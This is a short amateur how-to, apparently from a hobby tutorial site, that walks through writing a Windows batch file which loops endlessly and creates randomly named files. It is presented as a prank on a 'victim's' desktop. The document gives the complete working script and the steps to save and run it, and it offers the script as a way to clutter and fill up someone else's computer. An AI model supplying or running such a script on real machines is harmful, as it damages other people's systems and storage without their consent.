Introduction: Batch Files

This is how to create a batch file that creates lots of files on the victims desktop.

Step 1: Step 1

Goto start then click run and type notepad

Step 2: Setp 2

in notepad type:

@echo off
:A
cd %current%
echo >%random%.%random%
goto A

Step 3: Step 3

click file then click save as and save it as any thing you wan't.bat it has to end with .bat or it won't work. and choose all files.

Step 4: Step 4

Command Prompt will come up just leave it for a while then close it and there will be lots of files on their desktop!!!!! It will give them random names like this 3437.7830. It will always have the dot in the middle.